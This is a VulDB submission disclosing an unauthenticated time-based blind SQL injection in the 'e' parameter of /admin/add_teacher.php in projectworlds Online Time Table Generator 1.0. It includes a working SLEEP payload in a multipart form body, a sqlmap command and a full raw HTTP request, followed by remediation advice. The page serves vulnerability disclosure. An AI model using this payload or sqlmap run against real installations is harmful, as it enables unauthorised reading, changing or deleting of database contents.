提交 #580412: projectworlds Online Time Table Generator PHP MYSQL V1.0 sqli信息

标题projectworlds Online Time Table Generator PHP MYSQL V1.0 sqli
描述# DESCRIPTION - During the security review of "Online Time Table Generator PHP MYSQL",I discovered a critical SQL injection vulnerability in the "/admin/add_teacher.php" file. This vulnerability stems from insufficient user input validation of the 'e' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability lonameion: - 'e' parameter ## Payload: ```makefile Parameter: MULTIPART e ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="n" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="e" [email protected]' AND (SELECT 2585 FROM (SELECT(SLEEP(5)))LRCB) AND 'ZAHI'='ZAHI ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="p" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="m" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="a" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="save" Add Teacher ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6-- ``` ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash 《python sqlmap.py -r sqli.txt -p e --dbms=mysql --batch》 ``` <img width="803" alt="Image" src="https://github.com/hhhanxx/attack/blob/main/Snipaste_2025-05-19_10-37-24.png?raw=true" /> sqli.txt: ``` POST /admin/add_teacher.php HTTP/1.1 Host: 192.168.137.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Length: 701 Origin: http://192.168.137.1:8000 Connection: close Referer: http://192.168.137.1:8000/admin/add_teacher.php Cookie: PHPSESSID=i98ggi13qjkm6fk3rts3ah3r23 Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="n" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="e" [email protected] ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="p" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="m" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="a" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="save" Add Teacher ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6-- ``` # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
来源⚠️ https://github.com/hhhanxx/attack/issues/18
用户
 attackxuu (UID 85453)
提交2025-05-19 04時39分 (1 年前)
管理2025-05-20 15時39分 (1 day later)
状态已接受
VulDB条目309662 [projectworlds Online Time Table Generator 1.0 /admin/add_teacher.php SQL注入]
积分20

上一步一览下一步

Want to know what is going to be exploited?

We predict KEV entries!